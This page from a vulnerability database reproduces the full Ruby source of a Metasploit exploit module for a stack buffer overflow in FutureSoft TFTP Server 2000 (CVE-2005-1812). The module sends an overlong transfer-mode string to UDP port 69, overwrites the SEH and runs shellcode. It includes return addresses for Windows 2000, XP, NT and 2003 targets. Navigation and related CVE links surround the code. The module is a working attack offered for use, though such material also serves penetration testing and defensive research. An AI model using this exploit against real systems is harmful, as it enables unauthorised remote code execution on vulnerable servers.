Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormMCPACKETSTORM:83173
HistoryNov 26, 2009 - 12:00 a.m.

FutureSoft TFTP Server 2000 Transfer-Mode Overflow

2009-11-2600:00:00
MC
packetstormsecurity.com
15

0.696 Medium

EPSS

Percentile

98.0%

JSON
`##  
# $Id$  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to   
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
  
require 'msf/core'  
  
  
class Metasploit3 < Msf::Exploit::Remote  
  
include Msf::Exploit::Remote::Udp  
include Msf::Exploit::Remote::Seh  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'FutureSoft TFTP Server 2000 Transfer-Mode Overflow',  
'Description' => %q{  
This module exploits a stack overflow in the FutureSoft TFTP Server  
2000 product. By sending an overly long transfer-mode string, we were able  
to overwrite both the SEH and the saved EIP. A subsequent write-exception   
that will occur allows the transferring of execution to our shellcode   
via the overwritten SEH. This module has been tested against Windows  
2000 Professional and for some reason does not seem to work against   
Windows 2000 Server (could not trigger the overflow at all).  
},  
'Author' => 'MC',  
'Version' => '$Revision$',  
'References' =>   
[   
['CVE', '2005-1812'],  
['OSVDB', '16954'],  
['BID', '13821'],  
['URL', 'http://www.security.org.sg/vuln/tftp2000-1001.html'],  
  
],  
'DefaultOptions' =>  
{  
'EXITFUNC' => 'process',  
},  
'Payload' =>  
{  
'Space' => 350,  
'BadChars' => "\x00",  
'StackAdjustment' => -3500,  
},  
  
'Platform' => 'win',  
  
'Targets' =>  
[  
['Windows 2000 Pro English ALL', { 'Ret' => 0x75022ac4} ], # ws2help.dll  
['Windows XP Pro SP0/SP1 English', { 'Ret' => 0x71aa32ad} ], # ws2help.dll  
['Windows NT SP5/SP6a English', { 'Ret' => 0x776a1799} ], # ws2help.dll  
['Windows 2003 Server English', { 'Ret' => 0x7ffc0638} ], # PEB return  
  
],  
  
'Privileged' => true,  
  
'DisclosureDate' => 'May 31 2005'))  
  
register_options(  
[  
Opt::RPORT(69)  
], self.class)  
  
end  
  
def exploit  
connect_udp  
  
print_status("Trying target #{target.name}...")  
  
sploit = "\x00\x01" + rand_text_english(14, payload_badchars) + "\x00"  
sploit += rand_text_english(167, payload_badchars)  
seh = generate_seh_payload(target.ret)  
sploit[157, seh.length] = seh  
sploit += "\x00"  
  
udp_sock.put(sploit)  
  
handler  
disconnect_udp  
end  
  
end  
`

Related

nvd 2
cvelist 2
cve 2
prion 1
securityvulns 1
nvd
nvd
CVE-2005-1812
2005-06-01 04:00:00
CVE-2007-1645
2007-03-24 00:19:00
cvelist
cvelist
CVE-2005-1812
2022-10-03 16:22:42
CVE-2007-1645
2007-03-24 00:00:00
cve
cve
CVE-2005-1812
2022-10-03 16:22:42
CVE-2007-1645
2007-03-24 00:19:00
prion
prion
Buffer overflow
2007-03-24 00:19:00
securityvulns
securityvulns
Futuresoft TFTP Server multiple vulnerabilities
2005-07-18 00:00:00

0.696 Medium

EPSS

Percentile

98.0%

JSON
Related for PACKETSTORM:83173
nvd2cvelist2cve2prion1securityvulns1